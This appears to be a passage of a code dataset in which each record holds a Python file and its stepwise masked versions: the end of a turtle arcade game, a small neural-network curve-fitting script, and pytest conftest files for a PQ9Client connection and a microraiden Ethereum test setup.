\"right\"\r\n\r\n def stop_player():\r\n player.direction = \"stop\"\r\n\r\n # Keyboard Binding\r\n wn.listen()\r\n wn.onkeypress(go_left, \"Left\")\r\n wn.onkeyrelease(stop_player, \"Left\")\r\n wn.onkeypress(go_right, \"Right\")\r\n wn.onkeyrelease(stop_player, \"Right\")\r\n\r\n\r\n \r\n while True:\r\n # Update screen\r\n wn.update()\r\n\r\n # Move the player\r\n if player.direction == \"left\":\r\n x = player.xcor()\r\n if x > -365:\r\n x -= 0.8\r\n player.setx(x)\r\n \r\n if player.direction == \"right\":\r\n x = player.xcor()\r\n if x < 365:\r\n x += 0.8\r\n player.setx(x)\r\n\r\n # Move the good guys\r\n for good_guy in good_guys:\r\n y = good_guy.ycor()\r\n y -= good_guy.speed\r\n good_guy.sety(y)\r\n\r\n # Check if off the screen\r\n if y < -300:\r\n x = random.randint(-380, 380)\r\n y = random.randint(300, 400)\r\n good_guy.goto(x, y)\r\n\r\n # Check for a collision with player\r\n if good_guy.distance(player) < 40:\r\n x = random.randint(-380, 380)\r\n y = random.randint(300, 400)\r\n good_guy.goto(x, y)\r\n score += 10\r\n pen.clear()\r\n pen.write(\"Score: {} Lives: {}\".format(score, lives), align=\"center\", font=font)\r\n winsound.PlaySound(\"video_game_retro_8bit_coin\", winsound.SND_FILENAME)\r\n \r\n # Move the bad guys\r\n for bad_guy in bad_guys:\r\n y = bad_guy.ycor()\r\n y -= bad_guy.speed\r\n bad_guy.sety(y)\r\n\r\n # Check if off the screen\r\n if y < -300:\r\n x = random.randint(-380, 380)\r\n y = random.randint(300, 400)\r\n bad_guy.goto(x, y)\r\n\r\n # Check for a collision with player\r\n if bad_guy.distance(player) < 40:\r\n x = random.randint(-380, 380)\r\n y = random.randint(300, 400)\r\n bad_guy.goto(x, y)\r\n score -= 10\r\n lives -= 1\r\n pen.clear()\r\n pen.write(\"Score: {} Lives: {}\".format(score, lives), align=\"center\", font=font)\r\n winsound.PlaySound(\"arcade_game_alarm_short\", winsound.SND_FILENAME)\r\n\r\n if lives <= 0:\r\n pen.clear()\r\n bad_guy.clear()\r\n good_guy.clear()\r\n show_message(score)\r\n winsound.PlaySound(\"game_over_sound\", winsound.SND_FILENAME)\r\n # wn.listen()\r\n # if wn.onkeypress(toggle_new_game, \"a\"):\r\n # if new_game == True:\r\n break\r\n # wn.onkeypress(sys.exit(), \"q\")\r\n\r\nwhile True:\r\n # Update screen\r\n wn.update()\r\n\r\n # Play music\r\n wn.bgpic(\"retro_city.gif\")\r\n winsound.PlaySound(\"retro_video_game_music-trimmed\", winsound.SND_LOOP)\r\n game_loop()\r\n turtle.Screen().clear()\r\n \r\n wn = turtle.Screen()\r\n wn.title(\"MaskUp\")\r\n wn.bgcolor(\"green\")\r\n wn.bgpic(\"retro_city_title_page.gif\")\r\n wn.setup(width=800, height=600)\r\n wn.tracer(0)\r\n\r\n #sys.exit()\r\n \r\n \r\n \r\n \r\n\r\n\r\nwn.mainloop()",
"step-ids": [
0,
2,
3,
4,
5
]
}
|
[
0,
2,
3,
4,
5
] |
import numpy as np
import pickle as p
from mpl_toolkits.mplot3d import axes3d
import matplotlib.pyplot as plt
from numpy.random import randn
from neural_network import network
net = network([1,8,8,1], filename='./data/x', bias=True)
# net.load_random()
net.load()
n = 32
x = np.array([[x] for x in np.linspace(0,1,n)])
y = (1+np.sin(10*x))/2
X = [xx[0] for xx in x]
Y = [yy[0] for yy in y]
plt.plot(x,y)
c = 1
ii = 0
for ii in range(1001):
# c = net.gradient_training(x,y,dw=0.1)
c = net.retarded_training(x,y)
print(ii,c)
net.save()
# if ii%10==0 and ii!=0:
# net.shake(x,y,n=10)
# net.save()
# # ii+=1
N = 128
plt.plot(X,Y, 'ro')
X = np.linspace(0,1,N)
Y = []
for x in X:
Y += [net.forward([x])[0]]
plt.plot(X,np.array(Y))
plt.show()
# for i in range(len(self.z)):
# if i==0:
# yHat = self.forward(x)
# delta = np.multiply(yHat - y, sigmoidPrime(self.z[-1]))
# dJdW = np.dot(self.a[-2].T, delta)
# else:
# delta = np.dot(delta, self.W[-i].T)*sigmoidPrime(self.z[-1-i])
# dJdW = np.dot(self.a[-2-i].T, delta)
# dJ += [dJdW]
# dJ = dJ[::-1]
|
normal
|
{
"blob_id": "cf07344808f2d91d8949cfc4beb9f923926e6851",
"index": 6208,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nnet.load()\n<mask token>\nplt.plot(x, y)\n<mask token>\nfor ii in range(1001):\n c = net.retarded_training(x, y)\n print(ii, c)\n net.save()\n<mask token>\nplt.plot(X, Y, 'ro')\n<mask token>\nfor x in X:\n Y += [net.forward([x])[0]]\nplt.plot(X, np.array(Y))\nplt.show()\n",
"step-3": "<mask token>\nnet = network([1, 8, 8, 1], filename='./data/x', bias=True)\nnet.load()\nn = 32\nx = np.array([[x] for x in np.linspace(0, 1, n)])\ny = (1 + np.sin(10 * x)) / 2\nX = [xx[0] for xx in x]\nY = [yy[0] for yy in y]\nplt.plot(x, y)\nc = 1\nii = 0\nfor ii in range(1001):\n c = net.retarded_training(x, y)\n print(ii, c)\n net.save()\nN = 128\nplt.plot(X, Y, 'ro')\nX = np.linspace(0, 1, N)\nY = []\nfor x in X:\n Y += [net.forward([x])[0]]\nplt.plot(X, np.array(Y))\nplt.show()\n",
"step-4": "import numpy as np\nimport pickle as p\nfrom mpl_toolkits.mplot3d import axes3d\nimport matplotlib.pyplot as plt\nfrom numpy.random import randn\nfrom neural_network import network\nnet = network([1, 8, 8, 1], filename='./data/x', bias=True)\nnet.load()\nn = 32\nx = np.array([[x] for x in np.linspace(0, 1, n)])\ny = (1 + np.sin(10 * x)) / 2\nX = [xx[0] for xx in x]\nY = [yy[0] for yy in y]\nplt.plot(x, y)\nc = 1\nii = 0\nfor ii in range(1001):\n c = net.retarded_training(x, y)\n print(ii, c)\n net.save()\nN = 128\nplt.plot(X, Y, 'ro')\nX = np.linspace(0, 1, N)\nY = []\nfor x in X:\n Y += [net.forward([x])[0]]\nplt.plot(X, np.array(Y))\nplt.show()\n",
"step-5": "import numpy as np\nimport pickle as p\nfrom mpl_toolkits.mplot3d import axes3d\nimport matplotlib.pyplot as plt\nfrom numpy.random import randn\nfrom neural_network import network\n\nnet = network([1,8,8,1], filename='./data/x', bias=True)\n# net.load_random()\nnet.load()\n\nn = 32\n\nx = np.array([[x] for x in np.linspace(0,1,n)])\ny = (1+np.sin(10*x))/2\n\nX = [xx[0] for xx in x]\nY = [yy[0] for yy in y]\n\nplt.plot(x,y)\n\nc = 1\nii = 0\n\nfor ii in range(1001):\n # c = net.gradient_training(x,y,dw=0.1)\n c = net.retarded_training(x,y)\n print(ii,c)\n net.save()\n # if ii%10==0 and ii!=0:\n # net.shake(x,y,n=10)\n # net.save()\n # # ii+=1\n\nN = 128\n\nplt.plot(X,Y, 'ro')\n\nX = np.linspace(0,1,N)\nY = []\n\nfor x in X:\n Y += [net.forward([x])[0]]\n\nplt.plot(X,np.array(Y))\nplt.show()\n\n\n# for i in range(len(self.z)):\n# if i==0:\n# yHat = self.forward(x)\n# delta = np.multiply(yHat - y, sigmoidPrime(self.z[-1]))\n# dJdW = np.dot(self.a[-2].T, delta)\n# else:\n# delta = np.dot(delta, self.W[-i].T)*sigmoidPrime(self.z[-1-i])\n# dJdW = np.dot(self.a[-2-i].T, delta)\n\n# dJ += [dJdW]\n\n# dJ = dJ[::-1]",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
def pytest_addoption(parser):
print('Option ')
parser.addoption('--destination', action='store', help=
'subsystem address', dest='destination')
@pytest.fixture
def destination(request):
print(request.config.getoption('--html'))
return request.config.getoption('--destination')
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def pytest_collection_modifyitems(session, config, items):
print('sono qui', items)
def pytest_ignore_collect(path, config):
print(path)
print('mamma ', config.getoption('--destination'))
return False
def pytest_addoption(parser):
print('Option ')
parser.addoption('--destination', action='store', help=
'subsystem address', dest='destination')
@pytest.fixture
def destination(request):
print(request.config.getoption('--html'))
return request.config.getoption('--destination')
@pytest.fixture(scope='session')
def pq9_connection():
pq9client = PQ9Client.PQ9Client('localhost', '10000')
pq9client.connect()
yield pq9client
pq9client.close()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def pytest_configure(config):
print('pytest_configure')
def pytest_collection_modifyitems(session, config, items):
print('sono qui', items)
def pytest_ignore_collect(path, config):
print(path)
print('mamma ', config.getoption('--destination'))
return False
def pytest_addoption(parser):
print('Option ')
parser.addoption('--destination', action='store', help=
'subsystem address', dest='destination')
@pytest.fixture
def destination(request):
print(request.config.getoption('--html'))
return request.config.getoption('--destination')
@pytest.fixture(scope='session')
def pq9_connection():
pq9client = PQ9Client.PQ9Client('localhost', '10000')
pq9client.connect()
yield pq9client
pq9client.close()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
sys.path.insert(1, '../Generic')
<|reserved_special_token_0|>
def pytest_configure(config):
print('pytest_configure')
def pytest_collection_modifyitems(session, config, items):
print('sono qui', items)
def pytest_ignore_collect(path, config):
print(path)
print('mamma ', config.getoption('--destination'))
return False
def pytest_addoption(parser):
print('Option ')
parser.addoption('--destination', action='store', help=
'subsystem address', dest='destination')
@pytest.fixture
def destination(request):
print(request.config.getoption('--html'))
return request.config.getoption('--destination')
@pytest.fixture(scope='session')
def pq9_connection():
pq9client = PQ9Client.PQ9Client('localhost', '10000')
pq9client.connect()
yield pq9client
pq9client.close()
<|reserved_special_token_1|>
# content of conftest.py
import pytest
import sys
sys.path.insert(1, '../Generic')
import PQ9Client
def pytest_configure(config):
print("pytest_configure")
def pytest_collection_modifyitems(session, config, items):
print("sono qui", items)
def pytest_ignore_collect(path, config):
print(path)
print("mamma ", config.getoption("--destination"))
return False
def pytest_addoption(parser):
print("Option ")
parser.addoption(
"--destination", action="store", help="subsystem address", dest="destination",
)
@pytest.fixture
def destination(request):
print(request.config.getoption("--html"))
#print(request.config.getoption("kkk"))
return request.config.getoption("--destination")
@pytest.fixture(scope="session") #only 'make' this object once per session.
def pq9_connection():
pq9client = PQ9Client.PQ9Client("localhost","10000")
pq9client.connect()
yield pq9client
pq9client.close()
|
flexible
|
{
"blob_id": "ad88685e3f1cd5e0ddb42a5982a05ff8ee7b8111",
"index": 1586,
"step-1": "<mask token>\n\n\ndef pytest_addoption(parser):\n print('Option ')\n parser.addoption('--destination', action='store', help=\n 'subsystem address', dest='destination')\n\n\n@pytest.fixture\ndef destination(request):\n print(request.config.getoption('--html'))\n return request.config.getoption('--destination')\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef pytest_collection_modifyitems(session, config, items):\n print('sono qui', items)\n\n\ndef pytest_ignore_collect(path, config):\n print(path)\n print('mamma ', config.getoption('--destination'))\n return False\n\n\ndef pytest_addoption(parser):\n print('Option ')\n parser.addoption('--destination', action='store', help=\n 'subsystem address', dest='destination')\n\n\n@pytest.fixture\ndef destination(request):\n print(request.config.getoption('--html'))\n return request.config.getoption('--destination')\n\n\n@pytest.fixture(scope='session')\ndef pq9_connection():\n pq9client = PQ9Client.PQ9Client('localhost', '10000')\n pq9client.connect()\n yield pq9client\n pq9client.close()\n",
"step-3": "<mask token>\n\n\ndef pytest_configure(config):\n print('pytest_configure')\n\n\ndef pytest_collection_modifyitems(session, config, items):\n print('sono qui', items)\n\n\ndef pytest_ignore_collect(path, config):\n print(path)\n print('mamma ', config.getoption('--destination'))\n return False\n\n\ndef pytest_addoption(parser):\n print('Option ')\n parser.addoption('--destination', action='store', help=\n 'subsystem address', dest='destination')\n\n\n@pytest.fixture\ndef destination(request):\n print(request.config.getoption('--html'))\n return request.config.getoption('--destination')\n\n\n@pytest.fixture(scope='session')\ndef pq9_connection():\n pq9client = PQ9Client.PQ9Client('localhost', '10000')\n pq9client.connect()\n yield pq9client\n pq9client.close()\n",
"step-4": "<mask token>\nsys.path.insert(1, '../Generic')\n<mask token>\n\n\ndef pytest_configure(config):\n print('pytest_configure')\n\n\ndef pytest_collection_modifyitems(session, config, items):\n print('sono qui', items)\n\n\ndef pytest_ignore_collect(path, config):\n print(path)\n print('mamma ', config.getoption('--destination'))\n return False\n\n\ndef pytest_addoption(parser):\n print('Option ')\n parser.addoption('--destination', action='store', help=\n 'subsystem address', dest='destination')\n\n\n@pytest.fixture\ndef destination(request):\n print(request.config.getoption('--html'))\n return request.config.getoption('--destination')\n\n\n@pytest.fixture(scope='session')\ndef pq9_connection():\n pq9client = PQ9Client.PQ9Client('localhost', '10000')\n pq9client.connect()\n yield pq9client\n pq9client.close()\n",
"step-5": "# content of conftest.py\nimport pytest\nimport sys\nsys.path.insert(1, '../Generic')\nimport PQ9Client\n \ndef pytest_configure(config):\n print(\"pytest_configure\")\n \ndef pytest_collection_modifyitems(session, config, items):\n print(\"sono qui\", items)\n \ndef pytest_ignore_collect(path, config):\n print(path)\n print(\"mamma \", config.getoption(\"--destination\"))\n return False \n\ndef pytest_addoption(parser):\n print(\"Option \")\n parser.addoption(\n \"--destination\", action=\"store\", help=\"subsystem address\", dest=\"destination\",\n )\n@pytest.fixture\ndef destination(request):\n print(request.config.getoption(\"--html\"))\n #print(request.config.getoption(\"kkk\"))\n return request.config.getoption(\"--destination\")\n\n@pytest.fixture(scope=\"session\") #only 'make' this object once per session.\ndef pq9_connection():\n pq9client = PQ9Client.PQ9Client(\"localhost\",\"10000\")\n pq9client.connect()\n\n yield pq9client\n pq9client.close()\n",
"step-ids": [
2,
5,
6,
7,
9
]
}
|
[
2,
5,
6,
7,
9
] |
<|reserved_special_token_0|>
@pytest.fixture
def contracts_relative_path():
return 'data/contracts.json'
@pytest.fixture
def compiled_contracts_path(test_dir, contracts_relative_path):
return os.path.join(test_dir, contracts_relative_path)
@pytest.fixture
def compiled_contracts(compiled_contracts_path):
return json.load(open(compiled_contracts_path))
<|reserved_special_token_0|>
@pytest.fixture(scope='session')
def use_tester(request):
return request.config.getoption('use_tester')
@pytest.fixture
def api_endpoint():
"""address of a paywall proxy"""
return 'localhost'
@pytest.fixture
def api_endpoint_port():
"""port the paywall proxy listens on"""
return 5000
@pytest.fixture
def api_endpoint_address(api_endpoint, api_endpoint_port):
return api_endpoint + ':' + str(api_endpoint_port)
@pytest.fixture
def init_contract_address():
return '0x' + 'a' * 40
<|reserved_special_token_0|>
@pytest.fixture(scope='session')
def deployer_address(deployer_privkey):
return privkey_to_addr(deployer_privkey)
<|reserved_special_token_0|>
@pytest.fixture(scope='session')
def contract_abis(contract_abi_path):
abi_file = open(contract_abi_path, 'r')
return json.load(abi_file)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@pytest.fixture
def contracts_relative_path():
return 'data/contracts.json'
@pytest.fixture
def compiled_contracts_path(test_dir, contracts_relative_path):
return os.path.join(test_dir, contracts_relative_path)
@pytest.fixture
def compiled_contracts(compiled_contracts_path):
return json.load(open(compiled_contracts_path))
<|reserved_special_token_0|>
@pytest.fixture(scope='session')
def use_tester(request):
return request.config.getoption('use_tester')
@pytest.fixture
def api_endpoint():
"""address of a paywall proxy"""
return 'localhost'
@pytest.fixture
def api_endpoint_port():
"""port the paywall proxy listens on"""
return 5000
@pytest.fixture
def api_endpoint_address(api_endpoint, api_endpoint_port):
return api_endpoint + ':' + str(api_endpoint_port)
@pytest.fixture
def init_contract_address():
return '0x' + 'a' * 40
<|reserved_special_token_0|>
@pytest.fixture(scope='session')
def deployer_address(deployer_privkey):
return privkey_to_addr(deployer_privkey)
<|reserved_special_token_0|>
@pytest.fixture(scope='session')
def contract_abis(contract_abi_path):
abi_file = open(contract_abi_path, 'r')
return json.load(abi_file)
<|reserved_special_token_0|>
@pytest.fixture(scope='session')
def token_abi(contract_abis):
return contract_abis[TOKEN_ABI_NAME]['abi']
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@pytest.fixture
def contracts_relative_path():
return 'data/contracts.json'
@pytest.fixture
def compiled_contracts_path(test_dir, contracts_relative_path):
return os.path.join(test_dir, contracts_relative_path)
@pytest.fixture
def compiled_contracts(compiled_contracts_path):
return json.load(open(compiled_contracts_path))
@pytest.fixture
def test_dir():
return os.path.dirname(os.path.dirname(__file__)) + '/../'
@pytest.fixture(scope='session')
def use_tester(request):
return request.config.getoption('use_tester')
@pytest.fixture
def api_endpoint():
"""address of a paywall proxy"""
return 'localhost'
@pytest.fixture
def api_endpoint_port():
"""port the paywall proxy listens on"""
return 5000
@pytest.fixture
def api_endpoint_address(api_endpoint, api_endpoint_port):
return api_endpoint + ':' + str(api_endpoint_port)
@pytest.fixture
def init_contract_address():
return '0x' + 'a' * 40
<|reserved_special_token_0|>
@pytest.fixture(scope='session')
def deployer_privkey():
return remove_0x_prefix(encode_hex(keys[3]))
@pytest.fixture(scope='session')
def deployer_address(deployer_privkey):
return privkey_to_addr(deployer_privkey)
<|reserved_special_token_0|>
@pytest.fixture(scope='session')
def contract_abis(contract_abi_path):
abi_file = open(contract_abi_path, 'r')
return json.load(abi_file)
@pytest.fixture(scope='session')
def channel_manager_abi(contract_abis):
return contract_abis[CHANNEL_MANAGER_ABI_NAME]['abi']
@pytest.fixture(scope='session')
def channel_manager_bytecode(contract_abis):
return contract_abis[CHANNEL_MANAGER_ABI_NAME]['bytecode']
@pytest.fixture(scope='session')
def token_abi(contract_abis):
return contract_abis[TOKEN_ABI_NAME]['abi']
@pytest.fixture(scope='session')
def token_bytecode(contract_abis):
return contract_abis[TOKEN_ABI_NAME]['bytecode']
@pytest.fixture(scope='session')
def kovan_block_time():
return 4
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@pytest.fixture
def contracts_relative_path():
return 'data/contracts.json'
@pytest.fixture
def compiled_contracts_path(test_dir, contracts_relative_path):
return os.path.join(test_dir, contracts_relative_path)
@pytest.fixture
def compiled_contracts(compiled_contracts_path):
return json.load(open(compiled_contracts_path))
@pytest.fixture
def test_dir():
return os.path.dirname(os.path.dirname(__file__)) + '/../'
@pytest.fixture(scope='session')
def use_tester(request):
return request.config.getoption('use_tester')
@pytest.fixture
def api_endpoint():
"""address of a paywall proxy"""
return 'localhost'
@pytest.fixture
def api_endpoint_port():
"""port the paywall proxy listens on"""
return 5000
@pytest.fixture
def api_endpoint_address(api_endpoint, api_endpoint_port):
return api_endpoint + ':' + str(api_endpoint_port)
@pytest.fixture
def init_contract_address():
return '0x' + 'a' * 40
@pytest.fixture
def manager_state_path():
return '/tmp/rmp-state.pkl'
@pytest.fixture(scope='session')
def deployer_privkey():
return remove_0x_prefix(encode_hex(keys[3]))
@pytest.fixture(scope='session')
def deployer_address(deployer_privkey):
return privkey_to_addr(deployer_privkey)
<|reserved_special_token_0|>
@pytest.fixture(scope='session')
def contract_abis(contract_abi_path):
abi_file = open(contract_abi_path, 'r')
return json.load(abi_file)
@pytest.fixture(scope='session')
def channel_manager_abi(contract_abis):
return contract_abis[CHANNEL_MANAGER_ABI_NAME]['abi']
@pytest.fixture(scope='session')
def channel_manager_bytecode(contract_abis):
return contract_abis[CHANNEL_MANAGER_ABI_NAME]['bytecode']
@pytest.fixture(scope='session')
def token_abi(contract_abis):
return contract_abis[TOKEN_ABI_NAME]['abi']
@pytest.fixture(scope='session')
def token_bytecode(contract_abis):
return contract_abis[TOKEN_ABI_NAME]['bytecode']
@pytest.fixture(scope='session')
def kovan_block_time():
return 4
<|reserved_special_token_1|>
import pytest
from eth_utils import encode_hex, remove_0x_prefix
from ethereum.tester import keys
import os
import json
from microraiden.client.client import CHANNEL_MANAGER_ABI_NAME, TOKEN_ABI_NAME
from microraiden.crypto import privkey_to_addr
@pytest.fixture
def contracts_relative_path():
return 'data/contracts.json'
@pytest.fixture
def compiled_contracts_path(test_dir, contracts_relative_path):
return os.path.join(test_dir, contracts_relative_path)
@pytest.fixture
def compiled_contracts(compiled_contracts_path):
return json.load(open(compiled_contracts_path))
@pytest.fixture
def test_dir():
return os.path.dirname(os.path.dirname(__file__)) + "/../"
@pytest.fixture(scope='session')
def use_tester(request):
return request.config.getoption('use_tester')
@pytest.fixture
def api_endpoint():
"""address of a paywall proxy"""
return 'localhost'
@pytest.fixture
def api_endpoint_port():
"""port the paywall proxy listens on"""
return 5000
@pytest.fixture
def api_endpoint_address(api_endpoint, api_endpoint_port):
return api_endpoint + ":" + str(api_endpoint_port)
@pytest.fixture
def init_contract_address():
return "0x" + "a" * 40
@pytest.fixture
def manager_state_path():
return '/tmp/rmp-state.pkl'
@pytest.fixture(scope='session')
def deployer_privkey():
return remove_0x_prefix(encode_hex(keys[3]))
@pytest.fixture(scope='session')
def deployer_address(deployer_privkey):
return privkey_to_addr(deployer_privkey)
@pytest.fixture(scope='session')
def contract_abi_path():
return os.path.join(os.path.dirname(os.path.dirname(__file__)), '../data/contracts.json')
@pytest.fixture(scope='session')
def contract_abis(contract_abi_path):
abi_file = open(contract_abi_path, 'r')
return json.load(abi_file)
@pytest.fixture(scope='session')
def channel_manager_abi(contract_abis):
return contract_abis[CHANNEL_MANAGER_ABI_NAME]['abi']
@pytest.fixture(scope='session')
def channel_manager_bytecode(contract_abis):
return contract_abis[CHANNEL_MANAGER_ABI_NAME]['bytecode']
@pytest.fixture(scope='session')
def token_abi(contract_abis):
return contract_abis[TOKEN_ABI_NAME]['abi']
@pytest.fixture(scope='session')
def token_bytecode(contract_abis):
return contract_abis[TOKEN_ABI_NAME]['bytecode']
@pytest.fixture(scope='session')
def kovan_block_time():
return 4
|
flexible
|
{
"blob_id": "438fe1ccf265706e202d7cc6044e57590f29801f",
"index": 9375,
"step-1": "<mask token>\n\n\n@pytest.fixture\ndef contracts_relative_path():\n return 'data/contracts.json'\n\n\n@pytest.fixture\ndef compiled_contracts_path(test_dir, contracts_relative_path):\n return os.path.join(test_dir, contracts_relative_path)\n\n\n@pytest.fixture\ndef compiled_contracts(compiled_contracts_path):\n return json.load(open(compiled_contracts_path))\n\n\n<mask token>\n\n\n@pytest.fixture(scope='session')\ndef use_tester(request):\n return request.config.getoption('use_tester')\n\n\n@pytest.fixture\ndef api_endpoint():\n \"\"\"address of a paywall proxy\"\"\"\n return 'localhost'\n\n\n@pytest.fixture\ndef api_endpoint_port():\n \"\"\"port the paywall proxy listens on\"\"\"\n return 5000\n\n\n@pytest.fixture\ndef api_endpoint_address(api_endpoint, api_endpoint_port):\n return api_endpoint + ':' + str(api_endpoint_port)\n\n\n@pytest.fixture\ndef init_contract_address():\n return '0x' + 'a' * 40\n\n\n<mask token>\n\n\n@pytest.fixture(scope='session')\ndef deployer_address(deployer_privkey):\n return privkey_to_addr(deployer_privkey)\n\n\n<mask token>\n\n\n@pytest.fixture(scope='session')\ndef contract_abis(contract_abi_path):\n abi_file = open(contract_abi_path, 'r')\n return json.load(abi_file)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\n@pytest.fixture\ndef contracts_relative_path():\n return 'data/contracts.json'\n\n\n@pytest.fixture\ndef compiled_contracts_path(test_dir, contracts_relative_path):\n return os.path.join(test_dir, contracts_relative_path)\n\n\n@pytest.fixture\ndef compiled_contracts(compiled_contracts_path):\n return json.load(open(compiled_contracts_path))\n\n\n<mask token>\n\n\n@pytest.fixture(scope='session')\ndef use_tester(request):\n return request.config.getoption('use_tester')\n\n\n@pytest.fixture\ndef api_endpoint():\n \"\"\"address of a paywall proxy\"\"\"\n return 'localhost'\n\n\n@pytest.fixture\ndef api_endpoint_port():\n \"\"\"port the paywall proxy listens on\"\"\"\n return 5000\n\n\n@pytest.fixture\ndef api_endpoint_address(api_endpoint, api_endpoint_port):\n return api_endpoint + ':' + str(api_endpoint_port)\n\n\n@pytest.fixture\ndef init_contract_address():\n return '0x' + 'a' * 40\n\n\n<mask token>\n\n\n@pytest.fixture(scope='session')\ndef deployer_address(deployer_privkey):\n return privkey_to_addr(deployer_privkey)\n\n\n<mask token>\n\n\n@pytest.fixture(scope='session')\ndef contract_abis(contract_abi_path):\n abi_file = open(contract_abi_path, 'r')\n return json.load(abi_file)\n\n\n<mask token>\n\n\n@pytest.fixture(scope='session')\ndef token_abi(contract_abis):\n return contract_abis[TOKEN_ABI_NAME]['abi']\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\n@pytest.fixture\ndef contracts_relative_path():\n return 'data/contracts.json'\n\n\n@pytest.fixture\ndef compiled_contracts_path(test_dir, contracts_relative_path):\n return os.path.join(test_dir, contracts_relative_path)\n\n\n@pytest.fixture\ndef compiled_contracts(compiled_contracts_path):\n return json.load(open(compiled_contracts_path))\n\n\n@pytest.fixture\ndef test_dir():\n return os.path.dirname(os.path.dirname(__file__)) + '/../'\n\n\n@pytest.fixture(scope='session')\ndef use_tester(request):\n return request.config.getoption('use_tester')\n\n\n@pytest.fixture\ndef api_endpoint():\n \"\"\"address of a paywall proxy\"\"\"\n return 'localhost'\n\n\n@pytest.fixture\ndef api_endpoint_port():\n \"\"\"port the paywall proxy listens on\"\"\"\n return 5000\n\n\n@pytest.fixture\ndef api_endpoint_address(api_endpoint, api_endpoint_port):\n return api_endpoint + ':' + str(api_endpoint_port)\n\n\n@pytest.fixture\ndef init_contract_address():\n return '0x' + 'a' * 40\n\n\n<mask token>\n\n\n@pytest.fixture(scope='session')\ndef deployer_privkey():\n return remove_0x_prefix(encode_hex(keys[3]))\n\n\n@pytest.fixture(scope='session')\ndef deployer_address(deployer_privkey):\n return privkey_to_addr(deployer_privkey)\n\n\n<mask token>\n\n\n@pytest.fixture(scope='session')\ndef contract_abis(contract_abi_path):\n abi_file = open(contract_abi_path, 'r')\n return json.load(abi_file)\n\n\n@pytest.fixture(scope='session')\ndef channel_manager_abi(contract_abis):\n return contract_abis[CHANNEL_MANAGER_ABI_NAME]['abi']\n\n\n@pytest.fixture(scope='session')\ndef channel_manager_bytecode(contract_abis):\n return contract_abis[CHANNEL_MANAGER_ABI_NAME]['bytecode']\n\n\n@pytest.fixture(scope='session')\ndef token_abi(contract_abis):\n return contract_abis[TOKEN_ABI_NAME]['abi']\n\n\n@pytest.fixture(scope='session')\ndef token_bytecode(contract_abis):\n return contract_abis[TOKEN_ABI_NAME]['bytecode']\n\n\n@pytest.fixture(scope='session')\ndef kovan_block_time():\n return 4\n",
"step-4": "<mask token>\n\n\n@pytest.fixture\ndef contracts_relative_path():\n return 'data/contracts.json'\n\n\n@pytest.fixture\ndef compiled_contracts_path(test_dir, contracts_relative_path):\n return os.path.join(test_dir, contracts_relative_path)\n\n\n@pytest.fixture\ndef compiled_contracts(compiled_contracts_path):\n return json.load(open(compiled_contracts_path))\n\n\n@pytest.fixture\ndef test_dir():\n return os.path.dirname(os.path.dirname(__file__)) + '/../'\n\n\n@pytest.fixture(scope='session')\ndef use_tester(request):\n return request.config.getoption('use_tester')\n\n\n@pytest.fixture\ndef api_endpoint():\n \"\"\"address of a paywall proxy\"\"\"\n return 'localhost'\n\n\n@pytest.fixture\ndef api_endpoint_port():\n \"\"\"port the paywall proxy listens on\"\"\"\n return 5000\n\n\n@pytest.fixture\ndef api_endpoint_address(api_endpoint, api_endpoint_port):\n return api_endpoint + ':' + str(api_endpoint_port)\n\n\n@pytest.fixture\ndef init_contract_address():\n return '0x' + 'a' * 40\n\n\n@pytest.fixture\ndef manager_state_path():\n return '/tmp/rmp-state.pkl'\n\n\n@pytest.fixture(scope='session')\ndef deployer_privkey():\n return remove_0x_prefix(encode_hex(keys[3]))\n\n\n@pytest.fixture(scope='session')\ndef deployer_address(deployer_privkey):\n return privkey_to_addr(deployer_privkey)\n\n\n<mask token>\n\n\n@pytest.fixture(scope='session')\ndef contract_abis(contract_abi_path):\n abi_file = open(contract_abi_path, 'r')\n return json.load(abi_file)\n\n\n@pytest.fixture(scope='session')\ndef channel_manager_abi(contract_abis):\n return contract_abis[CHANNEL_MANAGER_ABI_NAME]['abi']\n\n\n@pytest.fixture(scope='session')\ndef channel_manager_bytecode(contract_abis):\n return contract_abis[CHANNEL_MANAGER_ABI_NAME]['bytecode']\n\n\n@pytest.fixture(scope='session')\ndef token_abi(contract_abis):\n return contract_abis[TOKEN_ABI_NAME]['abi']\n\n\n@pytest.fixture(scope='session')\ndef token_bytecode(contract_abis):\n return contract_abis[TOKEN_ABI_NAME]['bytecode']\n\n\n@pytest.fixture(scope='session')\ndef kovan_block_time():\n return 4\n",
"step-5": "import pytest\nfrom eth_utils import encode_hex, remove_0x_prefix\nfrom ethereum.tester import keys\n\nimport os\nimport json\nfrom microraiden.client.client import CHANNEL_MANAGER_ABI_NAME, TOKEN_ABI_NAME\nfrom microraiden.crypto import privkey_to_addr\n\n\n@pytest.fixture\ndef contracts_relative_path():\n return 'data/contracts.json'\n\n\n@pytest.fixture\ndef compiled_contracts_path(test_dir, contracts_relative_path):\n return os.path.join(test_dir, contracts_relative_path)\n\n\n@pytest.fixture\ndef compiled_contracts(compiled_contracts_path):\n return json.load(open(compiled_contracts_path))\n\n\n@pytest.fixture\ndef test_dir():\n return os.path.dirname(os.path.dirname(__file__)) + \"/../\"\n\n\n@pytest.fixture(scope='session')\ndef use_tester(request):\n return request.config.getoption('use_tester')\n\n\n@pytest.fixture\ndef api_endpoint():\n \"\"\"address of a paywall proxy\"\"\"\n return 'localhost'\n\n\n@pytest.fixture\ndef api_endpoint_port():\n \"\"\"port the paywall proxy listens on\"\"\"\n return 5000\n\n\n@pytest.fixture\ndef api_endpoint_address(api_endpoint, api_endpoint_port):\n return api_endpoint + \":\" + str(api_endpoint_port)\n\n\n@pytest.fixture\ndef init_contract_address():\n return \"0x\" + \"a\" * 40\n\n\n@pytest.fixture\ndef manager_state_path():\n return '/tmp/rmp-state.pkl'\n\n\n@pytest.fixture(scope='session')\ndef deployer_privkey():\n return 